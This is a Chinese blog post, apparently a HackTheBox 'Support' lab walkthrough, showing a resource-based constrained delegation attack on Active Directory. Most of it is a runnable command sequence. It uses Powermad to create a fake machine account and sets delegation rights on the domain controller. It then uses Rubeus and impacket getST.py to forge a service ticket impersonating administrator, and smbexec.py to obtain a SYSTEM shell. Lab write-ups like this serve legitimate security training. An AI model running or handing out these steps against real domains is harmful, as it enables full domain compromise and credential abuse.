首页 > 其他分享 >kali之约束委派攻击

kali之约束委派攻击

时间:2023-02-25 17:36:18浏览次数:60  
标签:委派 htb kali support dc Value 约束 Variable Name

用到的工具

Powermad.ps1:https://github.com/Kevin-Robertson/Powermad
Rubeus.exe:https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
impacket工具包:https://github.com/fortra/impacket

Evil-Winrm : Winrm Pentesting Framework(远程渗透管理工具)

安装:gem install evil-winrm

约束委派攻击

前提:通过Evil-Winrm工具获取到目标机器的普通权限

注意:(以下命令参数值根据实际情况进行修改)

上传提权所用的文件到目标机

upload /root/Desktop/kerberos/Powermad/Powermad.ps1
upload /root/Desktop/kerberos/Ghostpack-CompiledBinaries/Rubeus.exe
Import-Module ./Powermad.ps1  # 导入模块命令

# 设置参数
Set-Variable -Name "FakePC" -Value "FAKE01"  # FAKE01这个名字可以自己改
Set-Variable -Name "targetComputer" -Value "DC"

创建一个新用户(执行如下命令,会创建一个FAKE01用户)

New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# 设置权限
Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')

# 检查是否工作
Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount

生成hash,aes256

./Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:support.htb

kali执行如下(根据实际情况进行修改)

# 添加hosts文件
echo "10.10.11.174 support.htb" >> /etc/hosts
echo "10.10.11.174 dc.support.htb" >> /etc/hosts

# 生成TGT票据
python3 getST.py support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B

# 添加票据
export KRB5CCNAME=administrator.ccache

# 连接机器
smbexec.py support.htb/[email protected] -no-pass -k

成功获取系统权限

标签:委派,htb,kali,support,dc,Value,约束,Variable,Name
From: https://www.cnblogs.com/Cx330Lm/p/17154798.html

相关文章

  • JAVAWEB-NOTE03-约束、数据库设计、多表查询、事务
    目录约束约束的概念约束的分类约束的演示外键约束数据库设计简介软件研发的步骤数据库设计概念数据库设计的步骤一对多(多对一)多对多一对一多表查询内连接外连接左外连接右......
  • Spring for Apache Kafka: @KafkaListener 的使用示例(消费)
    版本Version2.7.8-- 阅读Version2.7.8的SpringforApacheKafka官方文档,检出其中的注解@KafkaListener的使用方式。关键词:ConsumerRecord、Message、......
  • 渗透-kali Linux忘记用户名与登录密码的解决办法
    当kailLinux忘记登录用户名和登录密码时在kail的gui页面是没有任何的找回密码之类的按钮解决办法1:重启kail系统 2:在重启过程中按E3:进入......
  • 表的完整性约束
    ​ 为防止不符合规范的数据存入数据库,在用户对数据进行插入、修改、删除等操作时,MySQL提供了一种机制来检查数据库中的数据是否满足规定的条件,以保证数据库中数据的准确......
  • 表的完整性约束
    ​ 为防止不符合规范的数据存入数据库,在用户对数据进行插入、修改、删除等操作时,MySQL提供了一种机制来检查数据库中的数据是否满足规定的条件,以保证数据库中数据的准确......
  • vmware kali安装
    第一步获取kali系统链接:kali官网选择虚拟机安装选择64位vmware,下载torrent是种子文件,迅雷应该可以搞定,没试过sum是SHA256的校验和验证文件SHA256校验和windowsc......
  • 打破双亲委派机制
    再来一个沙箱安全机制示例,尝试打破双亲委派机制,用自定义类加载器加载我们自己实现的java.lang.String.classpublicclassMyClassload1extendsClassLoader{priv......
  • 为什么要设计双亲委派机制
    为什么要设计双亲委派机制?沙箱安全机制:自己写的java.lang.String.class类不会被加载,这样便可以防止核心API库被随意篡改避免类的重复加载:当父亲已经加载了该类时,就没有......
  • 数据库约束
    约束字段约束:比如创建一个age列,这里设置了字段类型为int,所以这里只能填int,不能填其他的类型约束是保证数据准确性的最后一道屏障,即为了保证表中的数据有效性非空约束(n......
  • kali-linux系统密码忘记了的解决方法
    1、电脑开机后kali系统会进入引导界面,这时不停的按【E】键进入启动前编辑命令(若系统没有出现这个页面,尝试重启以此来进入引导界面)2、进入启动前编辑命令界面后,在Linux这......